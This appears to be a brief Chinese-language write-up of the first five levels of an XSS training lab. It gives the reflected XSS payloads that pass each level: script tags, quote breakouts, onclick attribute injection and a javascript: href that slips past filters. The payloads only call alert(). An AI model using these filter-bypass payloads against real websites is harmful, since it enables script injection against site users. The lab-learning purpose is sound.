第一关
很简单不多讲
直接把<script>alert('xss')</script>
丢进去就可以了
第二关
把<script>alert('xss')</script>
丢上去报错了
查看前端代码发现被转义了
我们加一个">把前面的引号和input闭合了
输入"><script>alert('xss')</script>
过了
第三关
还是把<script>alert('xss')</script>
丢进去报错
看前端
后面被转义了
我们就用onclick
来弄
把'onclick='alert("xss")
弄进去
过了
第四关
这一关和上一关样
只是把单引号换成了双引号就行了
第五关
这一关把<script>
和on
禁了,会加入符号
大小写也做了转换
但是我们还可以用href
输入"><a href='javascript:alert(/xss/)'>
过了